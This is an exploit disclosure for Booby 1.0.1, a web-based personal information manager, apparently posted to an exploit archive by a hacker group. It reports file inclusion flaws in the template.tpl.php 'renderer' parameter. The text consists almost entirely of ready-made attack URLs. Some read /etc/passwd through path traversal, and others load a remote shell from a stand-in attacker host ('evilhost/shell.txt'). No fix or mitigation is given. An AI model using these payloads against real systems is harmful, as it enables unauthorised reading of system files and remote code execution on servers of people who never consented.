#software name: Booby #version: 1.0.1 #description: A Webbased Personal Information Manager (PIM) with support for bookmarks, calendar, contacts, notes, news and tasks. #download: http://sourceforge.net/project/showfiles.php?group_id=87672&package_id=91447&release_id=326826 #bug: Multiple Remote Vulnerabilities #contact: mailbox1333@gmail.com Local File Include / Remote File Include in: template.tpl.php Proof Of Concept LFI: http://localhost/path/templates/barrel/template.tpl.php?renderer=../../../../../../etc/passwd http://localhost/path/templates/barry/template.tpl.php?renderer=../../../../../../etc/passwd http://localhost/path/templates/mylook/template.tpl.php?renderer=../../../../../../etc/passwd http://localhost/path/templates/oerdec/template.tpl.php?renderer=../../../../../../etc/passwd http://localhost/path/templates/penguin/template.tpl.php?renderer=../../../../../../etc/passwd http://localhost/path/templates/sidebar/template.tpl.php?renderer=../../../../../../etc/passwd http://localhost/path/templates/slashdot/template.tpl.php?renderer=../../../../../../etc/passwd http://localhost/path/templates/text-only/template.tpl.php?renderer=../../../../../../etc/passwd Proof Of Concept RFI: http://localhost/path/templates/barrel/template.tpl.php?renderer=evilhost/shell.txt http://localhost/path/templates/barry/template.tpl.php?renderer=evilhost/shell.txt http://localhost/path/templates/mylook/template.tpl.php?renderer=evilhost/shell.txt http://localhost/path/templates/oerdec/template.tpl.php?renderer=evilhost/shell.txt http://localhost/path/templates/penguin/template.tpl.php?renderer=evilhost/shell.txt http://localhost/path/templates/sidebar/template.tpl.php?renderer=evilhost/shell.txt http://localhost/path/templates/slashdot/template.tpl.php?renderer=evilhost/shell.txt http://localhost/path/templates/text-only/template.tpl.php?renderer=evilhost/shell.txt regards> ph03n1xbroc / zuh_runezz / sara / sirzion / ov / mozi / picolo_elfo /